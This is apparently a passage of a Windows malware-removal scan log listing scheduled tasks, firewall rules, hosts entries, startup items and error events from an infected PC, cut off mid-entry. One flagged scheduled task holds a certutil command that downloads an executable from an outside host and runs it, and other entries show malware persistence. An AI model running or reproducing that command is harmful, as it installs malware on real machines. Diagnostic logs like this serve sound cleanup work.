- System32\Tasks\Synaptics TouchPad Enhancements => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe (Synaptics Incorporated -> Synaptics Incorporated) Task: {4B307496-C19B-4F0D-8A51-8EA93C3082D4} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe (Google Inc -> Google Inc.) Task: {567829EB-0803-46FA-8139-6EAAC8AC96FA} - System32\Tasks\{E2C35618-CCBE-4D12-A910-891C3DC29DF9} => C:\Windows\system32\pcalua.exe -a "C:\Users\Stanley\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe" -c /uninstall Task: {766C85C7-D024-4937-AD2A-1D565A0EFE0E} - System32\Tasks\Hewlett-Packard\HP Support Assistant\WarrantyChecker => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPWarrantyChecker.exe (HP Inc. -> HP Inc.) Task: {7F232E68-AE32-41F8-B98F-689DC0D3D5E5} - System32\Tasks\Hewlett-Packard\HP Active Health\HP Active Health Scan (HPSA) => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPActiveHealth\ActiveHealth.exe (HP Inc. -> HP Inc.) Task: {8292C123-B9AC-4784-B31B-420E6D1FFE44} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Updater => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSSFUpdater.exe (HP Inc. -> HP Inc.) Task: {83DEE68E-A3DD-4AE5-9A83-06EC0861E6BA} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe (Google Inc -> Google Inc.) Task: {B5D3DB14-5265-4538-9CB9-FDAA4A1D4D8B} - System32\Tasks\Hewlett-Packard\HP Support Assistant\WarrantyChecker_DeviceScan => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPWarrantyChecker.exe (HP Inc. -> HP Inc.) Task: {B8341303-B899-411B-B0C7-90BB369E5C8C} - System32\Tasks\Opera scheduled Autoupdate 1525449700 => C:\Program Files\Opera\launcher.exe (Opera Software AS -> Opera Software) Task: {C28388CC-478E-460F-BC73-1BB706E4CB8B} - System32\Tasks\{C2F55618-3604-4E37-AF83-6C71B337894D} => C:\Windows\system32\pcalua.exe -a C:\Users\Stanley\Downloads\Programs\ability-mail-server\setup.exe -d C:\Users\Stanley\Downloads\Programs\ability-mail-server Task: {C3FE92DB-969F-447D-9F05-1E0093D0326E} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://delaker.info/app/app.exe C:\Users\#Strazzo.RoseGold##\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\#Strazzo.RoseGold##\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ATTENTION Task: {DA1D9517-63D2-4DD4-B496-824CB060ABE0} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Product Configurator => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\ProductConfig.exe (HP Inc. -> HP Inc.) Task: {DCD49F79-E1DD-40AB-8653-E3D1BA2C9E1F} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant Quick Start => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe (HP Inc. -> HP Inc.) Task: {E6E376AE-3FCC-45F3-89EB-014031777959} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Health Analysis => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe (HP Inc. -> HP Inc.) Task: {E9BDD47D-D63C-4F59-8B54-0B30B7E5D664} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1692593245-3285590566-2148222763-1001Core => C:\Users\Stanley\AppData\Local\Google\Update\GoogleUpdate.exe (If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.) Task: C:\Windows\Tasks\HPCeeScheduleFor#Strazzo.RoseGold##.job => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe+HPCeeScheduleFor#Strazzo.RoseGold## (null)!STRAZZOWEEZY\#Strazzo.Ros Task: C:\Windows\Tasks\UCBrowserUpdater.job => C:\Program Files (x86)\UCBrowser\Application\update_task.exe/update!STRAZZOWEEZY\#Strazzo.Ros <==== ATTENTION ==================== Shortcuts & WMI ======================== (The entries could be listed to be restored or removed.) Shortcut: C:\Users\Stanley\AppData\Roaming\Microsoft\Windows\Network Shortcuts\My Web Sites on MSN\target.lnk -> hxxp://www.msnusers.co ShortcutWithArgument: C:\Users\Stanley\Desktop\BELIEVE WORKGROUP - Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory="Profile 1" ShortcutWithArgument: C:\Users\Stanley\Desktop\Person 1 - Chrome (1).lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory="Default" ShortcutWithArgument: C:\Users\Stanley\Desktop\Person 1 - Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory="Default" ShortcutWithArgument: C:\Users\Stanley\AppData\Local\Microsoft\Windows\Application Shortcuts\Microsoft.InternetExplorer.Default\Яндекс.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> -contentTile -formatVersion 0x00000002 -pinnedTimeLow 0x97d444c2 -pinnedTimeHigh 0x01cd8430 -securityFlags 0x00000000 -url 0x0000002a hxxp://www.yandex.ru/?win=331&clid=2100779 ShortcutWithArgument: C:\Users\Stanley\AppData\Local\Microsoft\Windows\Application Shortcuts\Microsoft.InternetExplorer.Default\Яндекс.Почта.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> -contentTile -formatVersion 0x00000002 -pinnedTimeLow 0x97d444c2 -pinnedTimeHigh 0x01cd8430 -securityFlags 0x00000000 -url 0x00000038 hxxp://mail.yandex.ru/?win=331&clid=2100779&from=dist_tl ShortcutWithArgument: C:\Users\Stanley\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\9501e18d7c2ab92e\WORKHARDGROUP 2 - Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory="Profile 2" ShortcutWithArgument: C:\Users\Stanley\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\69639df789022856\WORKHARDGROUP - Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory="Profile 1" ShortcutWithArgument: C:\Users\Stanley\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\225bb61db2f318c1\WORKHARDGROUP 3 - Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory="Profile 3" ==================== Loaded Modules (Whitelisted) ============== 2018-05-16 02:59 - 2018-05-16 02:59 - 000088888 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll 2019-01-15 01:27 - 2019-01-15 01:27 - 001356088 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll 2018-04-26 17:24 - 2018-04-26 17:24 - 000226208 _____ () C:\Program Files\OpenVPN\bin\liblzo2-2.dll 2018-04-26 17:24 - 2018-04-26 17:24 - 000127488 _____ () C:\Program Files\OpenVPN\bin\libpkcs11-helper-1.dll 2015-06-02 05:00 - 2015-06-02 05:00 - 000102912 _____ () C:\Windows\System32\IccLibDll_x64.dll 2019-01-23 16:33 - 2019-01-23 16:33 - 000088888 _____ () C:\Program Files\iTunes\zlib1.dll 2019-01-23 16:33 - 2019-01-23 16:33 - 001356088 _____ () C:\Program Files\iTunes\libxml2.dll - - 000000000 ____H () C:\Windows\windefender.exe 2015-05-26 16:46 - 2015-05-26 16:46 - 000094208 _____ () C:\Program Files (x86)\Common Files\Research In Motion\Tunnel Manager\libxpmux.dll 2018-04-12 18:06 - 2019-02-02 19:04 - 001837672 _____ () C:\Program Files (x86)\Microsoft\Skype for Desktop\ffmpeg.dll 2019-02-09 01:00 - 2019-02-02 19:04 - 002392416 _____ () \\?\C:\Program Files (x86)\Microsoft\Skype for Desktop\resources\app.asar.unpacked\node_modules\slimcore\bin\skypert.dll 2019-02-09 01:00 - 2019-02-02 19:04 - 000097840 _____ () \\?\C:\Program Files (x86)\Microsoft\Skype for Desktop\resources\app.asar.unpacked\node_modules\keytar\build\Release\keytar.node 2019-02-09 01:00 - 2019-02-02 19:04 - 000219696 _____ () \\?\C:\Program Files (x86)\Microsoft\Skype for Desktop\resources\app.asar.unpacked\node_modules\electron-ssid\build\Release\electron-ssid.node 2019-02-09 01:00 - 2019-02-02 19:04 - 000081768 _____ () \\?\C:\Program Files (x86)\Microsoft\Skype for Desktop\resources\app.asar.unpacked\node_modules\desktop-idle\build\Release\desktopIdle.node 2018-04-24 00:33 - 2018-04-24 00:33 - 000796160 _____ () C:\Users\Stanley\AppData\Roaming\uTorrent Web\avformat-57.dll 2018-04-24 00:33 - 2018-04-24 00:33 - 000446976 _____ () C:\Users\Stanley\AppData\Roaming\uTorrent Web\avutil-55.dll 2018-04-24 00:33 - 2018-04-24 00:33 - 001221120 _____ () C:\Users\Stanley\AppData\Roaming\uTorrent Web\avcodec-57.dll 2018-04-24 00:33 - 2018-04-24 00:33 - 000146944 _____ () C:\Users\Stanley\AppData\Roaming\uTorrent Web\swresample-2.dll 2019-01-15 01:28 - 2019-01-15 01:28 - 001042744 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll 2019-01-15 01:28 - 2019-01-15 01:28 - 000189752 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxslt.dll 2018-05-16 02:59 - 2018-05-16 02:59 - 000076088 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll 2018-04-12 18:06 - 2019-02-02 19:04 - 002901504 _____ () C:\Program Files (x86)\Microsoft\Skype for Desktop\libglesv2.dll 2018-04-12 18:06 - 2019-02-02 19:04 - 000015360 _____ () C:\Program Files (x86)\Microsoft\Skype for Desktop\libegl.dll 2019-02-09 01:00 - 2019-02-02 19:04 - 000405056 _____ () \\?\C:\Program Files (x86)\Microsoft\Skype for Desktop\resources\app.asar.unpacked\node_modules\@paulcbetts\spellchecker\build\Release\spellchecker.node 2019-02-09 01:00 - 2019-02-02 19:04 - 000138816 _____ () \\?\C:\Program Files (x86)\Microsoft\Skype for Desktop\resources\app.asar.unpacked\node_modules\keyboard-layout\build\Release\keyboard-layout-manager.node 2019-02-09 01:00 - 2019-02-02 19:05 - 003239784 _____ () \\?\C:\Program Files (x86)\Microsoft\Skype for Desktop\resources\app.asar.unpacked\node_modules\slimcore\bin\Processing.NDI.Lib.x86.dll ==================== Alternate Data Streams (Whitelisted) ========= (If an entry is included in the fixlist, only the ADS will be removed.) ==================== Safe Mode (Whitelisted) =================== (If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.) HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service" ==================== Association (Whitelisted) =============== (If an entry is included in the fixlist, the registry item will be restored to default or removed.) ==================== Internet Explorer trusted/restricted =============== (If an entry is included in the fixlist, it will be removed from the registry.) IE trusted site: HKU\.DEFAULT\...\localhost -> localhost IE trusted site: HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\localhost -> localhost ==================== Hosts content: ========================== (If needed Hosts: directive could be included in the fixlist to reset Hosts.) 2013-08-22 14:25 - 2019-02-05 00:52 - 002097392 _____ C:\Windows\system32\drivers\etc\hosts 127.0.0.1 space1.adminpressure.space 127.0.0.1 trackpressure.website 127.0.0.1 htagzdownload.pw 127.0.0.1 texttotalk.org 127.0.0.1 360devtraking.website 127.0.0.1 room1.360dev.info 127.0.0.1 djapp.info 127.0.0.1 technologievimy.com ==================== Other Areas ============================ (Currently there is no automatic fix for this section.) HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\Stanley\AppData\Local\Microsoft\Windows\Themes\RoamedThemeFiles\DesktopBackground\img4.jpg DNS Servers: 192.168.8.1 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1) HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: Off) Windows Firewall is enabled. ==================== MSCONFIG/TASK MANAGER disabled items == If an entry is included in the fixlist, it will be removed. MSCONFIG\Services: TeamViewer => 2 MSCONFIG\Services: TenorshareWinAdService => 2 MSCONFIG\Services: WsAppService => 2 HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\StartupApproved\Run: => "RIMDeviceManager" HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\StartupApproved\Run: => "QTWQA7PTCRBGCEE" HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\StartupApproved\Run: => "JKZDOH8VNLX91K7" HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\StartupApproved\Run: => "4571129" HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\StartupApproved\Run: => "Q92XOF6FK3X9RHU" HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\StartupApproved\Run: => "6137198" HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\StartupApproved\Run: => "1204047" HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\StartupApproved\Run: => "1214425" HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\StartupApproved\Run: => "9352489" HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\StartupApproved\Run: => "9159382" HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\StartupApproved\Run: => "E054W697C3ZT54X" HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\StartupApproved\Run: => "19U1RNX4SXNVB7C" HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\StartupApproved\Run: => "SWPR71H14U5B9RU" ==================== FirewallRules (Whitelisted) =============== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) FirewallRules: [{2E743188-52D4-4DD9-B217-D664724F7CFB}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe (TeamViewer -> TeamViewer GmbH) FirewallRules: [{43AF7D70-137B-4B1D-AFE0-04F02D56545C}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe (TeamViewer -> TeamViewer GmbH) FirewallRules: [{DD168D1B-C125-4EBC-A7D0-6AFF9BE0772A}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe (TeamViewer -> TeamViewer GmbH) FirewallRules: [{42B93515-7C12-4002-B25A-7BD87FD5B851}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe (TeamViewer -> TeamViewer GmbH) FirewallRules: [{7815BFA3-BBC0-42F3-B877-B594C5309503}] => (Allow) C:\Users\Stanley\AppData\Local\Google\Chrome\Application\chrome.exe No File FirewallRules: [{27C2BBAD-5A0F-4576-A28A-A9C79B0F4F8D}] => (Allow) C:\Users\Stanley\AppData\Local\Temp\7ZipSfx.000\bin\tools\aria2c.exe No File FirewallRules: [{DBF5369E-EA0B-4862-9E73-9A73C5F59B05}] => (Allow) C:\Users\Stanley\AppData\Roaming\uTorrent Web\utweb.exe (BitTorrent Inc -> BitTorrent Inc.) FirewallRules: [{4591E89F-16AC-4CA7-8427-171CEC1BDB2B}] => (Allow) C:\Users\Stanley\AppData\Roaming\uTorrent Web\utweb.exe (BitTorrent Inc -> BitTorrent Inc.) FirewallRules: [{20F020B5-B58A-41E0-B68B-68484D3D75D3}] => (Allow) C:\Users\Stanley\AppData\Roaming\uTorrent\uTorrent.exe (BitTorrent Inc -> BitTorrent Inc.) FirewallRules: [{B8C7B80E-5D41-4712-B4F9-14A009440E40}] => (Allow) C:\Users\Stanley\AppData\Roaming\uTorrent\uTorrent.exe (BitTorrent Inc -> BitTorrent Inc.) FirewallRules: [{6A75D8B5-DE20-4190-BE13-D677A70C815A}] => (Allow) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.) FirewallRules: [{22FE7C4C-E5B0-483D-B2B0-B3C0535F9642}] => (Allow) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.) FirewallRules: [TCP Query User{7E6EE6A2-2051-4E22-A8DA-500DD96D5B9F}C:\users\stanley\appdata\roaming\utorrent web\utweb.exe] => (Allow) C:\users\stanley\appdata\roaming\utorrent web\utweb.exe (BitTorrent Inc -> BitTorrent Inc.) FirewallRules: [UDP Query User{177D6342-C5E0-42F8-BDF2-447498871528}C:\users\stanley\appdata\roaming\utorrent web\utweb.exe] => (Allow) C:\users\stanley\appdata\roaming\utorrent web\utweb.exe (BitTorrent Inc -> BitTorrent Inc.) FirewallRules: [TCP Query User{3E58445D-EFFD-43A1-AEBD-5172049CF1D3}C:\program files\videolan\vlc\vlc.exe] => (Allow) C:\program files\videolan\vlc\vlc.exe (VideoLAN -> VideoLAN) FirewallRules: [UDP Query User{B4F7868A-7743-4460-AB96-204D5F529A9D}C:\program files\videolan\vlc\vlc.exe] => (Allow) C:\program files\videolan\vlc\vlc.exe (VideoLAN -> VideoLAN) FirewallRules: [{D6A6915E-8E38-4FA7-B167-934B21E2E6A6}] => (Allow) C:\Program Files (x86)\Anvsoft\Syncios\pdt_syncios.exe (Anvsoft Inc. -> Syncios Data Transfer) FirewallRules: [{D2C7973D-DE98-449B-9679-37D96AAC096A}] => (Allow) C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe (Apple Inc. -> Apple Inc.) FirewallRules: [{31AE2E75-E1A4-4EA8-AC68-234BD6A67E83}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.) FirewallRules: [{4FCA1FAA-8783-42DA-80FD-B7CCEEE6B919}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.) FirewallRules: [{FEB84E29-9231-4A79-8E14-2FB9168F73BC}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.) FirewallRules: [{EC7CB263-170E-4CD3-A718-B18FEBF58068}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.) FirewallRules: [{1EFA5CC6-47BC-403E-82CC-9C4013837F9E}] => (Allow) C:\Program Files (x86)\IncrediMail\Bin\IncMail.exe (IncrediMail Inc. -> IncrediMail Ltd.) FirewallRules: [{630011AD-F4A2-4A96-8B7F-20609B1643C8}] => (Allow) C:\Program Files (x86)\IncrediMail\Bin\IncMail.exe (IncrediMail Inc. -> IncrediMail Ltd.) FirewallRules: [{604F39BF-F17A-42E2-8768-FD13618EADAD}] => (Allow) C:\Program Files (x86)\IncrediMail\Bin\ImApp.exe (IncrediMail Inc. -> IncrediMail Ltd.) FirewallRules: [{1A05BB61-3191-442A-A7C8-3FD399D1C742}] => (Allow) C:\Program Files (x86)\IncrediMail\Bin\ImApp.exe (IncrediMail Inc. -> IncrediMail Ltd.) FirewallRules: [{AD0BAEF4-48BF-498A-B8E3-0D1E6B43B2BE}] => (Allow) C:\Program Files (x86)\IncrediMail\Bin\ImpCnt.exe (IncrediMail Inc. -> IncrediMail Ltd.) FirewallRules: [{57D02F10-F87D-4455-8142-3BD552673374}] => (Allow) C:\Program Files (x86)\IncrediMail\Bin\ImpCnt.exe (IncrediMail Inc. -> IncrediMail Ltd.) FirewallRules: [{7B7AEBBA-530C-47FF-B21F-41D628410DFC}] => (Allow) C:\Program Files (x86)\IncrediMail\Bin\ImpCnt.exe (IncrediMail Inc. -> IncrediMail Ltd.) FirewallRules: [{587A092A-9420-4320-9DDC-513DB0956BC2}] => (Allow) C:\Program Files (x86)\IncrediMail\Bin\ImpCnt.exe (IncrediMail Inc. -> IncrediMail Ltd.) FirewallRules: [{3F8E71DB-3CB9-46B0-9EEC-7E5BBF163810}] => (Allow) C:\Program Files (x86)\IncrediMail\Bin\ImpCnt.exe (IncrediMail Inc. -> IncrediMail Ltd.) FirewallRules: [{F323F12D-3EEC-4458-B055-FBAD54D42779}] => (Allow) C:\Program Files (x86)\IncrediMail\Bin\ImpCnt.exe (IncrediMail Inc. -> IncrediMail Ltd.) FirewallRules: [{3F67B498-C298-4567-8384-9D4AE7900D1F}] => (Allow) C:\Program Files (x86)\IncrediMail\Bin\ImpCnt.exe (IncrediMail Inc. -> IncrediMail Ltd.) FirewallRules: [{39A83BDE-1430-4A5B-8585-D464B7D8D881}] => (Allow) C:\Program Files (x86)\IncrediMail\Bin\ImpCnt.exe (IncrediMail Inc. -> IncrediMail Ltd.) FirewallRules: [{9965AD37-C5DF-45BB-A1C2-549EA064C54F}] => (Allow) C:\Program Files (x86)\IncrediMail\Bin\ImpCnt.exe (IncrediMail Inc. -> IncrediMail Ltd.) FirewallRules: [{B8A59D96-BE63-4FC8-A092-04A578AB2D75}] => (Allow) C:\Program Files (x86)\IncrediMail\Bin\ImpCnt.exe (IncrediMail Inc. -> IncrediMail Ltd.) FirewallRules: [{0A99D9E6-8165-4C2D-862E-B5CA99B76F53}] => (Allow) C:\Program Files (x86)\Anvsoft\Syncios\pdt_syncios.exe (Anvsoft Inc. -> Syncios Data Transfer) FirewallRules: [TCP Query User{FCAB66D8-96FF-4F4B-A106-15A490C11107}C:\windows.old\users\hp pc\appdata\local\google\chrome\application\chrome.exe] => (Allow) C:\windows.old\users\hp pc\appdata\local\google\chrome\application\chrome.exe No File FirewallRules: [UDP Query User{C180034F-D109-4AFE-8F36-F09BB28A0030}C:\windows.old\users\hp pc\appdata\local\google\chrome\application\chrome.exe] => (Allow) C:\windows.old\users\hp pc\appdata\local\google\chrome\application\chrome.exe No File FirewallRules: [{F03F74C6-9B28-4C5E-807F-CFFCE0C2E487}] => (Block) C:\windows.old\users\hp pc\appdata\local\google\chrome\application\chrome.exe No File FirewallRules: [{5BAFDC52-58EF-4B5B-A341-46B75F445987}] => (Block) C:\windows.old\users\hp pc\appdata\local\google\chrome\application\chrome.exe No File FirewallRules: [{7E343BED-6F88-4BCB-BE0E-54813155A57C}] => (Allow) C:\Program Files (x86)\Anvsoft\Syncios\pdt_syncios.exe (Anvsoft Inc. -> Syncios Data Transfer) FirewallRules: [TCP Query User{F497E2E2-C9E6-45B2-A63B-16B5868BB75F}C:\users\stanley\documents\documents\communigate pro software-62\communigatepro\cgserver.exe] => (Allow) C:\users\stanley\documents\documents\communigate pro software-62\communigatepro\cgserver.exe (CommuniGate Systems -> CommuniGate Systems, Inc.) FirewallRules: [UDP Query User{D68A9ADA-B646-45B9-BC3D-B69E53F63C97}C:\users\stanley\documents\documents\communigate pro software-62\communigatepro\cgserver.exe] => (Allow) C:\users\stanley\documents\documents\communigate pro software-62\communigatepro\cgserver.exe (CommuniGate Systems -> CommuniGate Systems, Inc.) FirewallRules: [{D5FA44F3-6E70-484A-B950-51C23F63C442}] => (Allow) C:\Program Files (x86)\AtomPark\Atomic Email Hunter\AtomicEmailHunter.exe No File FirewallRules: [{798BE548-E73F-4AF0-94AC-9E161FCF481B}] => (Allow) C:\Program Files (x86)\AtomPark\Atomic Email Hunter\AtomicEmailHunter.exe No File FirewallRules: [{B5F6D4BD-ADF9-4442-A0DC-0243CA6C4944}] => (Allow) C:\Program Files (x86)\Email Extractor 6\Program.exe No File FirewallRules: [{6B7EAF84-2E3E-4E50-BA29-83BCA3A5D636}] => (Allow) C:\Program Files (x86)\Email Extractor 6\Program.exe No File FirewallRules: [{99A77A1E-39A2-4180-A680-B4F7DED82A23}] => (Allow) C:\Users\Stanley\Downloads\tenorshare-iphone-data-recovery-trial261.exe (Tenorshare Co.,Ltd. -> Tenorshare Co.Ltd) FirewallRules: [{965E4860-FFA9-4075-B56B-8021BF7C78AC}] => (Allow) C:\Users\Stanley\Downloads\tenorshare-iphone-data-recovery-trial261.exe (Tenorshare Co.,Ltd. -> Tenorshare Co.Ltd) FirewallRules: [{53056AED-CF0C-4B77-BE51-E7320F566EF1}] => (Allow) tunmgr.exe No File FirewallRules: [{99F55921-8B24-4D45-9447-4B1DC03D0F8F}] => (Allow) tunmgr.exe No File FirewallRules: [{926B5B97-5586-42AD-A783-764467766E9E}] => (Allow) mDNSResponder.exe No File FirewallRules: [{C1F252D6-9E31-4C1C-92CA-5144E45CBD5F}] => (Allow) mDNSResponder.exe No File FirewallRules: [{6AFB9D26-FE77-4DC6-959A-0279CB780F2D}] => (Allow) C:\Program Files (x86)\Common Files\Research In Motion\nginx\nginx.exe (BlackBerry Ltd. -> ) FirewallRules: [{59D91197-B7DA-4EA6-B24C-745E78D3BD44}] => (Allow) C:\Program Files (x86)\Common Files\Research In Motion\tunnel manager\PeerManager.exe (BlackBerry Ltd. -> BlackBerry Limited) FirewallRules: [{0E6991CE-14DF-4D95-80C9-B44D66357BF3}] => (Allow) C:\Program Files (x86)\BlackBerry\BlackBerry Blend\desktopinvokeproxy.exe (BlackBerry Ltd. -> BlackBerry Limited. All rights reserved) FirewallRules: [TCP Query User{7B49542B-C789-47CD-9DB3-B7DD02A86347}C:\code crafters\ability mail server 4\amsmain.exe] => (Allow) C:\code crafters\ability mail server 4\amsmain.exe (Code Crafters Software Limited) FirewallRules: [UDP Query User{EA212CF2-9380-45CC-A0BE-913C62F44EB3}C:\code crafters\ability mail server 4\amsmain.exe] => (Allow) C:\code crafters\ability mail server 4\amsmain.exe (Code Crafters Software Limited) FirewallRules: [{C23152A2-4900-4C77-9D5F-439619037A3E}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc -> Google Inc.) FirewallRules: [{4946DAD2-BDA2-4C06-AEDC-69B244D8AC93}] => (Allow) C:\Program Files\Opera\57.0.3098.106\opera.exe (Opera Software AS -> Opera Software) FirewallRules: [{2B35578A-2D33-4CA3-9363-D51EB0B19A68}] => (Allow) C:\Program Files\Opera\57.0.3098.116\opera.exe (Opera Software AS -> Opera Software) FirewallRules: [{A84BF917-A1A7-4A9F-BFEA-0BB51E9A14F9}] => (Allow) C:\Program Files\iTunes\iTunes.exe (Apple Inc. -> Apple Inc.) FirewallRules: [{3982D1B5-9BA8-4969-BF52-16243FA460F3}] => (Allow) C:\Program Files\Syncios\pdt_syncios.exe No File FirewallRules: [{C51AA61B-9FE2-4471-AABA-59CE0EFF056F}] => (Allow) C:\Program Files (x86)\Anvsoft\Syncios\pdt_syncios.exe (Anvsoft Inc. -> Syncios Data Transfer) FirewallRules: [{CAB19675-1F00-4595-9EF4-71D445CADCF3}] => (Allow) C:\Program Files (x86)\Anvsoft\Syncios\pdt_syncios.exe (Anvsoft Inc. -> Syncios Data Transfer) FirewallRules: [{6F63DBCC-4ACC-457F-93AE-3F8F539D5481}] => (Allow) C:\Program Files (x86)\Apowersoft\ApowerManager\ApowerManager.exe No File FirewallRules: [{38634E52-E26E-4827-B65C-6FD60DEEFCC1}] => (Allow) C:\Program Files (x86)\Apowersoft\ApowerManager\ApowerManager.exe No File FirewallRules: [{B8B2B85F-89FA-41D1-84C9-AD725179C6CF}] => (Allow) C:\Program Files (x86)\Apowersoft\ApowerManager\ApowerManagerCoreServices.exe No File FirewallRules: [{68A8AE5E-4C4A-41A3-9B22-62A04FA9BE31}] => (Allow) C:\Program Files (x86)\Apowersoft\ApowerManager\ApowerManagerCoreServices.exe No File FirewallRules: [{221BFC9C-CC6F-4FE4-B04E-F71FA6660C03}] => (Allow) C:\Windows\rss\csrss.exe () FirewallRules: [{2443D1D6-CC7F-4A8D-8467-39EE257F12AF}] => (Allow) C:\Users\#Strazzo.RoseGold##\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe No File FirewallRules: [{750614E7-22A3-4F87-88D1-B9F849CFB09C}] => (Allow) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.) FirewallRules: [{5F4A2E85-3A49-4CDA-8F9E-184057B5476A}] => (Allow) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.) ==================== Restore Points ========================= 20-01-2019 14:49:42 Scheduled Checkpoint 30-01-2019 08:42:13 Scheduled Checkpoint 07-02-2019 07:32:46 Scheduled Checkpoint ==================== Faulty Device Manager Devices ============= Name: Description: Class Guid: Manufacturer: Service: Problem: : The drivers for this device are not installed. (Code 28) Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard. ==================== Event log errors: ========================= Application errors: ================== Error: (02/12/2019 06:51:08 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: Faulting application name: chrome.exe, version: 71.0.3578.98, time stamp: 0x5c0f4450 Faulting module name: ntdll.dll, version: 6.3.9600.18969, time stamp: 0x5aa29ff0 Exception code: 0xc0000005 Fault offset: 0x000000000003de0e Faulting process id: 0x1810 Faulting application start time: 0x01d4c296d845137b Faulting application path: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Faulting module path: C:\Windows\SYSTEM32\ntdll.dll Report Id: 3148cd23-2e8a-11e9-8274-402cf4d8539a Faulting package full name: Faulting package-relative application ID: Error: (02/12/2019 06:51:08 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: Faulting application name: chrome.exe, version: 71.0.3578.98, time stamp: 0x5c0f4450 Faulting module name: 